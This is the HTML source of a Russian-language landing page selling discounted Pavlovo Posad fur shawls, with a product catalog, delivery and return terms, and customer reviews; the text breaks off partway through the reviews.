<!DOCTYPE html>
<html lang="ru-RU">
  <head>
    <title>РАСПРОДАЖА ПАВЛОПОСАДСКИХ МЕХОВЫХ ПЛАТКОВ</title>
    <meta name="description" content="РАСПРОДАЖА ПАВЛОПОСАДСКИХ МЕХОВЫХ ПЛАТКОВ" />
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width" />
    <link
      rel="icon"
      type="image/png"
      href="https://scarves-2.promo2020.ru/assets_page/favicon.png"
    />
    <link
      rel="stylesheet"
      href="assets_pages/land/js/slider/owlCarousel-2.2.1/owl.carousel.min.css"
    />
    <link
      rel="stylesheet"
      href="assets_page/css/styles.css"
    />
    <meta property="og:type" content="article" />
    <meta property="og:title" content="РАСПРОДАЖА ПАВЛОПОСАДСКИХ МЕХОВЫХ ПЛАТКОВ" />
    <meta
      property="og:description"
      content="РАСПРОДАЖА ПАВЛОПОСАДСКИХ МЕХОВЫХ ПЛАТКОВ"
    />
    <script
      src="https://code.jquery.com/jquery-3.4.1.js"
      integrity="sha256-WpOohJOqMqqyKL9FccASB9O0KwACQJpFTUBLTYOVvVU="
      crossorigin="anonymous"
    ></script>
    <script
      type="text/javascript"
      src="https://promo2020.ru/static/js/lt_landing_valid_form.js"
    ></script>
    <script
      type="text/javascript"
      src="https://promo2020.ru/static/js/lt_landing_script.js"
    ></script>
    <script type="text/javascript">
      $jsonData = {
        RU: {
          currency: " \u0440\u0443\u0431.",
          productsum: 1990,
          oldproductsum: 4890,
          delivery: 0,
          totalsum: "1990.00",
        },
      };
    </script>
    <script
      src="https://cdnjs.cloudflare.com/ajax/libs/OwlCarousel2/2.3.4/owl.carousel.min.js"
      integrity="sha512-bPs7Ae6pVvhOSiIcyUClR7/q2OAsRiovw4vAkX+zJbw3ShAeeqezq50RIIcIURq7Oa20rW2n2q+fyXBNcU9lrw=="
      crossorigin="anonymous"
    ></script>
    <link
      rel="stylesheet"
      href="https://cdnjs.cloudflare.com/ajax/libs/OwlCarousel2/2.3.4/assets/owl.carousel.css"
      integrity="sha512-UTNP5BXLIptsaj5WdKFrkFov94lDx+eBvbKyoe1YAfjeRPC+gT5kyZ10kOHCfNZqEui1sxmqvodNUx3KbuYI/A=="
      crossorigin="anonymous"
    />
    <link
      rel="stylesheet"
      href="https://cdnjs.cloudflare.com/ajax/libs/OwlCarousel2/2.3.4/assets/owl.theme.default.css"
      integrity="sha512-OTcub78R3msOCtY3Tc6FzeDJ8N9qvQn1Ph49ou13xgA9VsH9+LRxoFU6EqLhW4+PKRfU+/HReXmSZXHEkpYoOA=="
      crossorigin="anonymous"
    />

    <style>
      .ajax_loader {
        display: none;
      }

      .owl-carousel .owl-nav .owl-next {
        position: absolute;
        right: 0;
        top: 40%;
        outline: none;
        background: url("next.svg") center center / contain no-repeat !important;
        padding: 25px !important;
        color: transparent;
      }

      .owl-carousel .owl-nav .owl-next span {
        display: none;
      }

      .owl-carousel .owl-nav .owl-prev {
        position: absolute;
        color: transparent;
        left: 0;
        outline: none;
        top: 40%;
        transform: rotate(180deg);
        background: url("next.svg") center center / contain no-repeat !important;
        padding: 25px !important;
      }

      .owl-carousel .owl-nav .owl-prev span {
        display: none;
      }
    </style>

    <!-- LT code insertion -->
    <!-- /LT code insertion -->
  </head>
  <script>
    $(document).ready(function () {
      $(".razmer_item").click(function () {
        $(".razmer_item").removeClass("razmer_item_active");
        $(this).addClass("razmer_item_active");
      });

      var cat_2_art = 500;
      $(".cat_2_art").each(function () {
        $(this).html(cat_2_art);
        cat_2_art = cat_2_art + 1;
      });

      var cat_3_art = 600;
      $(".cat_3_art").each(function () {
        $(this).html(cat_3_art);
        cat_3_art = cat_3_art + 1;
      });

      $(".cart-add").click(function () {
        var articul = $(this).parent().parent().find(".artic_n").text();
        $(".descr").val(articul);
      });
      $(".slider_prods").owlCarousel({
        loop: true,
        margin: 10,
        nav: true,
        responsive: {
          0: {
            items: 1,
          },
          600: {
            items: 1,
          },
          1000: {
            items: 1,
          },
        },
      });
      $(".owl-next").html(" ");
      $(".owl-prev").html(" ");
    });
  </script>

  <style>
    .tovarimg {
      padding: 235px 180px;
    }

    .tovarimg2 {
      padding: 250px 180px;
    }

    .tovar_item {
      width: 30%;
      margin: 20px !important;
      background: #fff;
    }

    .nametovar {
      font-weight: 700;
      font-size: 26px;
      line-height: 1.1em;
      margin-top: 20px;
    }

    .goods-item__price {
      font-size: 30px;
      color: #cf0074;
    }

    .goods-item__price strike {
      margin: 0 15px 0 0;
      text-decoration: line-through;
      font-size: 22px;
      color: #222;
    }

    .tovar-item_sizezbox {
      display: flex;
      padding: 10px 20px 20px 20px;
      flex-wrap: wrap;
      justify-content: center;
    }

    .razmer_item {
      padding: 0 5px;
      font-size: 16px;
    }

    .razmer {
      font-weight: bold;
    }

    .btn-primary {
      display: block;
      margin: 20px auto;
      max-width: 310px;
      height: 56px;
      -webkit-border-radius: 4px;
      -moz-border-radius: 4px;
      border-radius: 4px;
      background: #329fb6;
      font-size: 22px;
      line-height: 56px;
      letter-spacing: 1px;
      color: #fff;
      text-transform: uppercase;
      text-decoration: none;
      text-align: center;
      position: relative;
    }

    .goods-item__body {
      padding: 0 10px;
    }

    .tovar_item {
      margin: 10px 0;
      transition: 0.2s;
      height: max-content;
    }

    .tovar_item:hover {
      box-shadow: 0 0 20px 0px #00000021;
    }

    .razmer_item_active {
      background: #329fb6;
      color: #fff;
    }

    .owl-theme .owl-dots {
      padding: 20px;
    }

    .pm {
      padding: 5px;
    }

    .color {
      margin: 5px 0;
    }

    .color b {
      display: block;
    }

    @media (max-width: 1170px) {
      .tovar_item {
        width: 100%;
        margin: 10px 0 !important;
      }

      .tovarimg {
        padding: 400px 180px;
      }
    }

    @media (max-width: 661px) {
      .tovarimg {
        padding: 270px 180px;
      }
    }

    .material {
      text-transform: lowercase;
    }

    .material b {
      text-transform: none;
    }
  </style>

  <body>
    <!-- header -->
    <header class="header_section">
      <div class="title_block">
        <div class="wrapper">
          <h1
            class="flag1"
            style="text-align: center; width: 100%; padding-right: 0 !important"
          >
            РАСПРОДАЖА ПАВЛОПОСАДСКИХ МЕХОВЫХ ПЛАТКОВ
          </h1>
        </div>
      </div>
      <div class="content_block">
        <div class="wrapper">
          <div class="info_block">
            <div class="logo">
              <img
                style="max-width: 70%"
                src="assets_page/images/logo.png"
                alt=""
              />
              <!-- <p>Интернет-магазин женской одежды</p> -->
            </div>
            <ul class="ofr_bull">
              <li>Качественный пошив из лучших материалов</li>
              <li>Множество цветов на выбор</li>
              <li>Доставка по всей России</li>
            </ul>
            <a href="index.html#catalog" class="button">Перейти в каталог</a>
          </div>
          <div class="sale">
            <p><span>-60%</span> на весь каталог</p>
          </div>
        </div>
      </div>
    </header>
    <!-- /header -->
    <!-- catalog -->
    <section class="catalog_section">
      <div class="wrapper">
        <div class="gallery">
          <img
            src="assets_page/images/gallery1.png"
            alt=""
          />
          <img
            src="assets_page/images/gallery2.png"
            alt=""
          />
          <img
            src="assets_page/images/gallery3.png"
            alt=""
          />
          <img
            src="assets_page/images/gallery4.png"
            alt=""
          />
        </div>
        <h2 id="catalog">Каталог</h2>
        <style>
          .sale-text {
            color: #fff;
            background: #d6af28;
            padding: 20px;
            text-align: center;
            border-radius: 10px;
            margin: 20px 40px;
            font-size: 24px;
            text-transform: uppercase;
            font-weight: 700;
          }

          .goods-item__title {
            font-size: 18px;
            font-weight: normal;
          }

          .goods-item__title p {
            font-size: 30px;
            font-weight: bold;
            margin: 10px 0 20px 0;
          }
        </style>
        <div class="products_list clearfix">
          <h2 id="catalog4" style="width: 100%; margin-top: 30px">
            ПАВЛОПОСАДСКИЕ МЕХОВЫЕ ПЛАТКИ
          </h2>

          <div class="tovar_item item1">
            <div class="goods-item">
              <div class="slider_prods owl-carousel owl-theme">
                <div
                  class="goods-item__img tovarimg tovarimg3"
                  id_product="1"
                  style="
                    background: url('imgs/catalog/1.jpg') top center / cover
                      no-repeat;
                  "
                ></div>
                <div
                  class="goods-item__img tovarimg tovarimg3"
                  id_product="1"
                  style="
                    background: url('imgs/catalog/1_2.jpg') top center / cover
                      no-repeat;
                  "
                ></div>
                <div
                  class="goods-item__img tovarimg tovarimg3"
                  id_product="1"
                  style="
                    background: url('imgs/catalog/1_3.jpg') top center / cover
                      no-repeat;
                  "
                ></div>
                <div
                  class="goods-item__img tovarimg tovarimg3"
                  id_product="1"
                  style="
                    background: url('imgs/catalog/1_4.jpg') top center / cover
                      no-repeat;
                  "
                ></div>
              </div>
              <div class="goods-item__body">
                <div class="goods-item__title nametovar" style="height: unset">
                  Меховой платок из норки
                  <p>Александра</p>
                </div>
                <div style="margin: 5px 0 10px 0">
                  <p class="pm material"><b>Материал</b>: Мех норки; Атлас</p>

                  <p class="pm color">
                    <b>Цвета:</b>Омбре(какао), <br />Блэк(темно-бирюзовый)
                  </p>
                  <p class="pm"><b>Обмен / возврат</b>: 60 дней</p>
                  <p class="pm"><b>Доставка без предоплаты</b></p>
                  <p style="opacity: 0.3">
                    артикул: <span class="cat_4_art artic_n">2101</span>
                  </p>
                </div>
                <div class="goods-item__price">
                  <span
                    ><span class="prlist pricenum">1990</span> р
                    <strike><span class="oldprlist">5150</span> р</strike></span
                  >
                </div>
                <div class="goods-item__btn">
                  <a
                    id_product="1"
                    class="btn btn-primary incart add cart-add"
                    data-name="Платок Зимняя краса с мехом норки"
                    data-price="1990"
                    data-image="imgs/1.jpg"
                    href="index.html#order_form"
                    >Заказать</a
                  >
                </div>
              </div>
            </div>
          </div>

          <div class="tovar_item item1">
            <div class="goods-item">
              <div class="slider_prods owl-carousel owl-theme">
                <div
                  class="goods-item__img tovarimg tovarimg3"
                  id_product="1"
                  style="
                    background: url('imgs/catalog/2.jpg') top center / cover
                      no-repeat;
                  "
                ></div>
                <div
                  class="goods-item__img tovarimg tovarimg3"
                  id_product="1"
                  style="
                    background: url('imgs/catalog/2_2.jpg') top center / cover
                      no-repeat;
                  "
                ></div>
                <div
                  class="goods-item__img tovarimg tovarimg3"
                  id_product="1"
                  style="
                    background: url('imgs/catalog/2_3.jpg') top center / cover
                      no-repeat;
                  "
                ></div>
                <div
                  class="goods-item__img tovarimg tovarimg3"
                  id_product="1"
                  style="
                    background: url('imgs/catalog/2_4.jpg') top center / cover
                      no-repeat;
                  "
                ></div>
              </div>
              <div class="goods-item__body">
                <div class="goods-item__title nametovar" style="height: unset">
                  Меховой платок из норки
                  <p>Анастасия</p>
                </div>
                <div style="margin: 5px 0 10px 0">
                  <p class="pm material"><b>Материал</b>: Мех норки; Атлас</p>

                  <p class="pm color">
                    <b>Цвета</b>Пастелевый (золотисто-черный),<br />
                    (темно-синий)
                  </p>
                  <p class="pm"><b>Обмен / возврат</b>: 60 дней</p>
                  <p class="pm"><b>Доставка без предоплаты</b></p>
                  <p style="opacity: 0.3">
                    артикул: <span class="cat_4_art artic_n">2102</span>
                  </p>
                </div>
                <div class="goods-item__price">
                  <span
                    ><span class="prlist pricenum">1990</span> р
                    <strike><span class="oldprlist">4650</span> р</strike></span
                  >
                </div>
                <div class="goods-item__btn">
                  <a
                    id_product="1"
                    class="btn btn-primary incart add cart-add"
                    data-name="Платок Зимняя краса с мехом норки"
                    data-price="1990"
                    data-image="imgs/1.jpg"
                    href="index.html#order_form"
                    >Заказать</a
                  >
                </div>
              </div>
            </div>
          </div>

          <div class="tovar_item item1">
            <div class="goods-item">
              <div class="slider_prods owl-carousel owl-theme">
                <div
                  class="goods-item__img tovarimg tovarimg3"
                  id_product="1"
                  style="
                    background: url('imgs/catalog/3.jpg') top center / cover
                      no-repeat;
                  "
                ></div>
                <div
                  class="goods-item__img tovarimg tovarimg3"
                  id_product="1"
                  style="
                    background: url('imgs/catalog/3_2.jpg') top center / cover
                      no-repeat;
                  "
                ></div>
                <div
                  class="goods-item__img tovarimg tovarimg3"
                  id_product="1"
                  style="
                    background: url('imgs/catalog/3_3.jpg') top center / cover
                      no-repeat;
                  "
                ></div>
                <div
                  class="goods-item__img tovarimg tovarimg3"
                  id_product="1"
                  style="
                    background: url('imgs/catalog/3_4.jpg') top center / cover
                      no-repeat;
                  "
                ></div>
              </div>
              <div class="goods-item__body">
                <div class="goods-item__title nametovar" style="height: unset">
                  Меховой платок из норки
                  <p>Соня</p>
                </div>
                <div style="margin: 5px 0 10px 0">
                  <p class="pm material"><b>Материал</b>: Мех норки; атлас</p>

                  <p class="pm color">
                    <b>Цвета</b>Аврора(серо-белый),<br />
                    Графит(шоколадный)
                  </p>
                  <p class="pm"><b>Обмен / возврат</b>: 60 дней</p>
                  <p class="pm"><b>Доставка без предоплаты</b></p>
                  <p style="opacity: 0.3">
                    артикул: <span class="cat_4_art artic_n">2103</span>
                  </p>
                </div>
                <div class="goods-item__price">
                  <span
                    ><span class="prlist pricenum">1990</span> р
                    <strike><span class="oldprlist">4490</span> р</strike></span
                  >
                </div>
                <div class="goods-item__btn">
                  <a
                    id_product="1"
                    class="btn btn-primary incart add cart-add"
                    data-name="Платок Зимняя краса с мехом норки"
                    data-price="1990"
                    data-image="imgs/1.jpg"
                    href="index.html#order_form"
                    >Заказать</a
                  >
                </div>
              </div>
            </div>
          </div>

          <div class="tovar_item item1">
            <div class="goods-item">
              <div class="slider_prods owl-carousel owl-theme">
                <div
                  class="goods-item__img tovarimg tovarimg3"
                  id_product="1"
                  style="
                    background: url('imgs/catalog/4.jpg') top center / cover
                      no-repeat;
                  "
                ></div>
                <div
                  class="goods-item__img tovarimg tovarimg3"
                  id_product="1"
                  style="
                    background: url('imgs/catalog/4_2.jpg') top center / cover
                      no-repeat;
                  "
                ></div>
                <div
                  class="goods-item__img tovarimg tovarimg3"
                  id_product="1"
                  style="
                    background: url('imgs/catalog/4_3.jpg') top center / cover
                      no-repeat;
                  "
                ></div>
                <div
                  class="goods-item__img tovarimg tovarimg3"
                  id_product="1"
                  style="
                    background: url('imgs/catalog/4_4.jpg') top center / cover
                      no-repeat;
                  "
                ></div>
              </div>
              <div class="goods-item__body">
                <div class="goods-item__title nametovar" style="height: unset">
                  Меховой платок из норки
                  <p>Татьяна</p>
                </div>
                <div style="margin: 5px 0 10px 0">
                  <p class="pm material"><b>Материал</b>: Мех норки; атлас</p>

                  <p class="pm color">
                    <b>Цвета</b>Жемчуг(красно-серый), Омбре(бардовый)
                  </p>
                  <p class="pm"><b>Обмен / возврат</b>: 60 дней</p>
                  <p class="pm"><b>Доставка без предоплаты</b></p>
                  <p style="opacity: 0.3">
                    артикул: <span class="cat_4_art artic_n">2104</span>
                  </p>
                </div>
                <div class="goods-item__price">
                  <span
                    ><span class="prlist pricenum">1990</span> р
                    <strike><span class="oldprlist">4350</span> р</strike></span
                  >
                </div>
                <div class="goods-item__btn">
                  <a
                    id_product="1"
                    class="btn btn-primary incart add cart-add"
                    data-name="Платок Зимняя краса с мехом норки"
                    data-price="1990"
                    data-image="imgs/1.jpg"
                    href="index.html#order_form"
                    >Заказать</a
                  >
                </div>
              </div>
            </div>
          </div>

          <div class="tovar_item item1">
            <div class="goods-item">
              <div class="slider_prods owl-carousel owl-theme">
                <div
                  class="goods-item__img tovarimg tovarimg3"
                  id_product="1"
                  style="
                    background: url('imgs/catalog/5.jpg') top center / cover
                      no-repeat;
                  "
                ></div>
                <div
                  class="goods-item__img tovarimg tovarimg3"
                  id_product="1"
                  style="
                    background: url('imgs/catalog/5_2.jpg') top center / cover
                      no-repeat;
                  "
                ></div>
                <div
                  class="goods-item__img tovarimg tovarimg3"
                  id_product="1"
                  style="
                    background: url('imgs/catalog/5_3.jpg') top center / cover
                      no-repeat;
                  "
                ></div>
                <div
                  class="goods-item__img tovarimg tovarimg3"
                  id_product="1"
                  style="
                    background: url('imgs/catalog/5_4.jpg') top center / cover
                      no-repeat;
                  "
                ></div>
              </div>
              <div class="goods-item__body">
                <div class="goods-item__title nametovar" style="height: unset">
                  Меховой платок из норки
                  <p>Ольга</p>
                </div>
                <div style="margin: 5px 0 10px 0">
                  <p class="pm material"><b>Материал</b>: Мех норки; атлас</p>

                  <p class="pm color">
                    <b>Цвета</b>Орех(золотисто-черный), Антрацит(Темно-синий)
                  </p>
                  <p class="pm"><b>Обмен / возврат</b>: 60 дней</p>
                  <p class="pm"><b>Доставка без предоплаты</b></p>
                  <p style="opacity: 0.3">
                    артикул: <span class="cat_4_art artic_n">2105</span>
                  </p>
                </div>
                <div class="goods-item__price">
                  <span
                    ><span class="prlist pricenum">1990</span> р
                    <strike><span class="oldprlist">4490</span> р</strike></span
                  >
                </div>
                <div class="goods-item__btn">
                  <a
                    id_product="1"
                    class="btn btn-primary incart add cart-add"
                    data-name="Платок Зимняя краса с мехом норки"
                    data-price="1990"
                    data-image="imgs/1.jpg"
                    href="index.html#order_form"
                    >Заказать</a
                  >
                </div>
              </div>
            </div>
          </div>

          <div class="tovar_item item1">
            <div class="goods-item">
              <div class="slider_prods owl-carousel owl-theme">
                <div
                  class="goods-item__img tovarimg tovarimg3"
                  id_product="1"
                  style="
                    background: url('imgs/catalog/6.jpg') top center / cover
                      no-repeat;
                  "
                ></div>
                <div
                  class="goods-item__img tovarimg tovarimg3"
                  id_product="1"
                  style="
                    background: url('imgs/catalog/6_2.jpg') top center / cover
                      no-repeat;
                  "
                ></div>
                <div
                  class="goods-item__img tovarimg tovarimg3"
                  id_product="1"
                  style="
                    background: url('imgs/catalog/6_3.jpg') top center / cover
                      no-repeat;
                  "
                ></div>
                <div
                  class="goods-item__img tovarimg tovarimg3"
                  id_product="1"
                  style="
                    background: url('imgs/catalog/6_4.jpg') top center / cover
                      no-repeat;
                  "
                ></div>
              </div>
              <div class="goods-item__body">
                <div class="goods-item__title nametovar" style="height: unset">
                  Меховой платок из норки
                  <p>Светлана</p>
                </div>
                <div style="margin: 5px 0 10px 0">
                  <p class="pm material"><b>Материал</b>: Мех норки, артикул</p>

                  <p class="pm color">
                    <b>Цвета</b>Бордо(коричневый),<br />
                    Блэк(черный)
                  </p>
                  <p class="pm"><b>Обмен / возврат</b>: 60 дней</p>
                  <p class="pm"><b>Доставка без предоплаты</b></p>
                  <p style="opacity: 0.3">
                    артикул: <span class="cat_4_art artic_n">2106</span>
                  </p>
                </div>
                <div class="goods-item__price">
                  <span
                    ><span class="prlist pricenum">1990</span> р
                    <strike><span class="oldprlist">5150</span> р</strike></span
                  >
                </div>
                <div class="goods-item__btn">
                  <a
                    id_product="1"
                    class="btn btn-primary incart add cart-add"
                    data-name="Платок Зимняя краса с мехом норки"
                    data-price="1990"
                    data-image="imgs/1.jpg"
                    href="index.html#order_form"
                    >Заказать</a
                  >
                </div>
              </div>
            </div>
          </div>

          <div class="tovar_item item1">
            <div class="goods-item">
              <div class="slider_prods owl-carousel owl-theme">
                <div
                  class="goods-item__img tovarimg tovarimg3"
                  id_product="1"
                  style="
                    background: url('imgs/catalog/7.jpg') top center / cover
                      no-repeat;
                  "
                ></div>
                <div
                  class="goods-item__img tovarimg tovarimg3"
                  id_product="1"
                  style="
                    background: url('imgs/catalog/7_2.jpg') top center / cover
                      no-repeat;
                  "
                ></div>
                <div
                  class="goods-item__img tovarimg tovarimg3"
                  id_product="1"
                  style="
                    background: url('imgs/catalog/7_3.jpg') top center / cover
                      no-repeat;
                  "
                ></div>
                <div
                  class="goods-item__img tovarimg tovarimg3"
                  id_product="1"
                  style="
                    background: url('imgs/catalog/7_4.jpg') top center / cover
                      no-repeat;
                  "
                ></div>
              </div>
              <div class="goods-item__body">
                <div class="goods-item__title nametovar" style="height: unset">
                  Меховой платок из норки
                  <p>Юлия</p>
                </div>
                <div style="margin: 5px 0 10px 0">
                  <p class="pm material">
                    <b>Материал</b>: Мех норки; текстиль
                  </p>

                  <p class="pm color">
                    <b>Цвета</b>Ирис(синий), <br />
                    Жемчуг(белый-капучино)
                  </p>
                  <p class="pm"><b>Обмен / возврат</b>: 60 дней</p>
                  <p class="pm"><b>Доставка без предоплаты</b></p>
                  <p style="opacity: 0.3">
                    артикул: <span class="cat_4_art artic_n">2107</span>
                  </p>
                </div>
                <div class="goods-item__price">
                  <span
                    ><span class="prlist pricenum">1990</span> р
                    <strike><span class="oldprlist">4350</span> р</strike></span
                  >
                </div>
                <div class="goods-item__btn">
                  <a
                    id_product="1"
                    class="btn btn-primary incart add cart-add"
                    data-name="Платок Зимняя краса с мехом норки"
                    data-price="1990"
                    data-image="imgs/1.jpg"
                    href="index.html#order_form"
                    >Заказать</a
                  >
                </div>
              </div>
            </div>
          </div>

          <div class="tovar_item item1">
            <div class="goods-item">
              <div class="slider_prods owl-carousel owl-theme">
                <div
                  class="goods-item__img tovarimg tovarimg3"
                  id_product="1"
                  style="
                    background: url('imgs/catalog/8.jpg') top center / cover
                      no-repeat;
                  "
                ></div>
                <div
                  class="goods-item__img tovarimg tovarimg3"
                  id_product="1"
                  style="
                    background: url('imgs/catalog/8_2.jpg') top center / cover
                      no-repeat;
                  "
                ></div>
                <div
                  class="goods-item__img tovarimg tovarimg3"
                  id_product="1"
                  style="
                    background: url('imgs/catalog/8_3.jpg') top center / cover
                      no-repeat;
                  "
                ></div>
                <div
                  class="goods-item__img tovarimg tovarimg3"
                  id_product="1"
                  style="
                    background: url('imgs/catalog/8_4.jpg') top center / cover
                      no-repeat;
                  "
                ></div>
              </div>
              <div class="goods-item__body">
                <div class="goods-item__title nametovar" style="height: unset">
                  Меховой платок из норки
                  <p>Кристина</p>
                </div>
                <div style="margin: 5px 0 10px 0">
                  <p class="pm material">
                    <b>Материал</b>: Мех норки; текстиль
                  </p>

                  <p class="pm color">
                    <b>Цвета</b>Жемчуг(белый), <br />Омбре(капучино)
                  </p>
                  <p class="pm"><b>Обмен / возврат</b>: 60 дней</p>
                  <p class="pm"><b>Доставка без предоплаты</b></p>
                  <p style="opacity: 0.3">
                    артикул: <span class="cat_4_art artic_n">2108</span>
                  </p>
                </div>
                <div class="goods-item__price">
                  <span
                    ><span class="prlist pricenum">1990</span> р
                    <strike><span class="oldprlist">4350</span> р</strike></span
                  >
                </div>
                <div class="goods-item__btn">
                  <a
                    id_product="1"
                    class="btn btn-primary incart add cart-add"
                    data-name="Платок Зимняя краса с мехом норки"
                    data-price="1990"
                    data-image="imgs/1.jpg"
                    href="index.html#order_form"
                    >Заказать</a
                  >
                </div>
              </div>
            </div>
          </div>

          <div class="tovar_item item1">
            <div class="goods-item">
              <div class="slider_prods owl-carousel owl-theme">
                <div
                  class="goods-item__img tovarimg tovarimg3"
                  id_product="1"
                  style="
                    background: url('imgs/catalog/9.jpg') top center / cover
                      no-repeat;
                  "
                ></div>
                <div
                  class="goods-item__img tovarimg tovarimg3"
                  id_product="1"
                  style="
                    background: url('imgs/catalog/9_2.jpg') top center / cover
                      no-repeat;
                  "
                ></div>
                <div
                  class="goods-item__img tovarimg tovarimg3"
                  id_product="1"
                  style="
                    background: url('imgs/catalog/9_3.jpg') top center / cover
                      no-repeat;
                  "
                ></div>
                <div
                  class="goods-item__img tovarimg tovarimg3"
                  id_product="1"
                  style="
                    background: url('imgs/catalog/9_4.jpg') top center / cover
                      no-repeat;
                  "
                ></div>
              </div>
              <div class="goods-item__body">
                <div class="goods-item__title nametovar" style="height: unset">
                  Меховой платок из песца
                  <p>Екатерина</p>
                </div>
                <div style="margin: 5px 0 10px 0">
                  <p class="pm material">
                    <b>Материал</b>: Мех норки; текстиль
                  </p>

                  <p class="pm color">
                    <b>Цвета</b>Жемчуг(белый), <br />Аврора(синий)
                  </p>
                  <p class="pm"><b>Обмен / возврат</b>: 60 дней</p>
                  <p class="pm"><b>Доставка без предоплаты</b></p>
                  <p style="opacity: 0.3">
                    артикул: <span class="cat_4_art artic_n">2109</span>
                  </p>
                </div>
                <div class="goods-item__price">
                  <span
                    ><span class="prlist pricenum">1990</span> р
                    <strike><span class="oldprlist">4350</span> р</strike></span
                  >
                </div>
                <div class="goods-item__btn">
                  <a
                    id_product="1"
                    class="btn btn-primary incart add cart-add"
                    data-name="Платок Зимняя краса с мехом норки"
                    data-price="1990"
                    data-image="imgs/1.jpg"
                    href="index.html#order_form"
                    >Заказать</a
                  >
                </div>
              </div>
            </div>
          </div>

        </div>
      </div>
    </section>
    <!-- /catalog -->
    <style>
      div.sc-intro {
        border: 2px solid #329fb6;
        border-radius: 6px;
        position: relative;
        padding: 20px 220px 16px 22px;
      }

      div.sc-intro div.body {
        background: url(intro_body.png) no-repeat 2px 0;
      }

      div.sc-intro > div {
        padding-left: 60px;
        margin-bottom: 4px;
      }

      div.sc-intro p {
        margin: 2px 0;
      }

      .bold15 {
        font-size: 15px;
        font-weight: bold;
      }

      div.sc-intro div.tape {
        background: url(intro_tape.png) no-repeat;
      }

      div.sc-intro div.dress {
        background: url(intro_dress.png) no-repeat 3px 0;
      }

      div.sc-intro:after {
        content: "";
        background: url(intro_icon.png) center center / contain no-repeat;
        display: block;
        position: absolute;
        top: 25px;
        right: 0;
        padding: 70px;
      }

      div.sc-page-wrapper {
        border: 1px solid #ededed;
        border-radius: 3px;
        margin: 16px 0;
      }

      div.sc-menu-wrapper {
        display: table;
        width: 100%;
      }

      div.sc-menu {
        display: table-row;
      }

      .bold21 {
        font-size: 21px;
        font-weight: bold;
      }

      div.sc-menu > div.active {
        background: white;
        border-bottom: 0;
      }

      div.sc-menu > div:nth-child(1) {
        border-right: 1px solid #ededed;
      }

      div.sc-menu > div {
        background: #f5f5f5;
        border-bottom: 1px solid #ededed;
        cursor: pointer;
        display: table-cell;
        padding: 20px 10px;
        width: 33.33%;
        text-align: center;
      }

      div.sc-page {
        padding: 20px;
        overflow: hidden;
      }

      span.sc-num {
        border: 1px solid #329fb6;
        border-radius: 50%;
        box-sizing: content-box !important;
        color: #329fb6;
        display: inline-block;
        font-weight: bold;
        font-size: 18px;
        line-height: 1;
        height: 18px;
        width: 18px;
        padding: 8px;
        margin-right: 10px;
        text-align: center;
      }

      span.title {
        display: inline-block;
        line-height: 1;
        vertical-align: top;
        padding-top: 7px;
        width: calc(100% - 46px);
      }

      div.sc-page-dress div.img {
        background: url(dress_body.png) no-repeat 0 -20px;
        height: 228px;
        width: 156px;
        float: left;
        margin-right: 30px;
      }

      div.sc-page div.line {
        background: #329fb6;
        height: 3px;
        position: relative;
      }

      div.sc-page div.line1:after {
        background: #329fb6;
        border-radius: 50%;
        content: "";
        display: block;
        position: absolute;
        height: 13px;
        width: 13px;
        right: -1px;
        top: -5px;
      }

      div.sc-page div.line {
        background: #329fb6;
        height: 3px;
        position: relative;
      }

      div.img-info {
        position: relative;
      }

      div.sc-page-dress div.img-info1 {
        margin-top: 30px;
      }

      .bold15 {
        font-size: 15px;
        font-weight: bold;
      }

      div.sc-page-dress div.img-info2 {
        margin-top: 54px;
      }

      div.sc-page table {
        margin-top: 20px;
        width: 100%;
        font-size: 16px;
      }

      div.sc-page table th,
      div.sc-page table td {
        padding: 8px 12px;
      }

      div.sc-page table .border-first {
        border-left: 2px solid #329fb6;
        border-top: 2px solid #329fb6;
        border-right: 2px solid #329fb6;
        color: #329fb6;
      }

      div.sc-page {
        padding: 20px;
        overflow: hidden;
      }

      div.sc-page table .border-n {
        border-left: 2px solid #329fb6;
        border-right: 2px solid #329fb6;
        color: #329fb6;
      }

      div.sc-page table .border-last {
        border-left: 2px solid #329fb6;
        border-bottom: 2px solid #329fb6;
        border-right: 2px solid #329fb6;
        color: #329fb6;
      }

      span.sc-num {
        border: 1px solid #329fb6;
        border-radius: 50%;
        box-sizing: content-box !important;
        color: #329fb6;
        display: inline-block;
        font-weight: bold;
        font-size: 18px;
        line-height: 1;
        height: 18px;
        width: 18px;
        padding: 8px;
        margin-right: 10px;
        text-align: center;
      }

      div.sc-page-swimwear div.img-info1 {
        margin-top: 50px;
      }

      @media (max-width: 786px) {
        div.sc-intro {
          padding: 20px;
        }
      }
    </style>

    <section class="order_info_section">
      <div class="wrapper">
        <h2>Доставка и гарантия</h2>
        <img
          class="product"
          src="assets_page/images/order_img.jpg"
          alt=""
        />
        <div class="info_list">
          <div class="info_item">
            <div class="icon_block">
              <img
                src="assets_page/images/order_info__info1_icon.png"
                alt=""
              />
            </div>
            <p>Доставка почтой в течение 3‑10 рабочих дней.</p>
          </div>
          <div class="info_item">
            <div class="icon_block">
              <img
                src="assets_page/images/order_info__info2_icon.png"
                alt=""
              />
            </div>
            <p>Оплата заказов осуществляется по факту получения товара</p>
          </div>
          <div class="info_item">
            <div class="icon_block">
              <img
                src="assets_page/images/order_info__info3_icon.png"
                alt=""
              />
            </div>
            <p>
              Все меховые изделия проходят обязательную проверку качества перед
              отправкой. Обмен/возврат 60 дней за наш счет.
            </p>
          </div>
        </div>
      </div>
    </section>
    <!-- /order info -->
    <!-- reviews -->
    <section class="reviews_section">
      <div class="wrapper">
        <h2>Отзывы покупателей</h2>
        <p class="description">
          Более <span>95,4%</span> покупателей рекомендуют наш магазин
        </p>
        <div class="rate">Средняя оценка товара</div>
        <div
          class="reviews_list owl-carousel"
          style="margin: 0 auto; display: flex; justify-content: center"
        >
          <div class="review_item">
            <img
              src="assets_page/images/reviews__review1_photo.jpg"
              alt=""
            />
            <div class="text_block">
              <p>
                Огромное спасибо за качество,индивидуальность, красоту!
                Идеальный вариант для тех,кому хочется разнообразия в холодное
                время года.У меня на счету уже несколько заказов женских платков претензий по качеству не было никогда. Отдельная
                благодарность за быструю доставку!
              </p>
              <div class="author_info">Маргарита, Мурманск</div>
            </div>
          </div>
          <div class="review_item">
            <img
              src="assets_page/images/reviews__review2_photo.jpg"
              alt=""
            />
            <div class="text_block">
              <p>
                Замечательный платок. Невесомый. Цвет текстиля мастера
                выполнили, как на фото. Особенно понравились кнопки и крючки для
                красивой и ровной посадки на голове. Красивый мех, потрясающий
                цвет самого платка Аврора. Под шубу и куртку с
                воротником-стойкой - идеально. Стильно, тепло, удобно. Спасибо!
              </p>
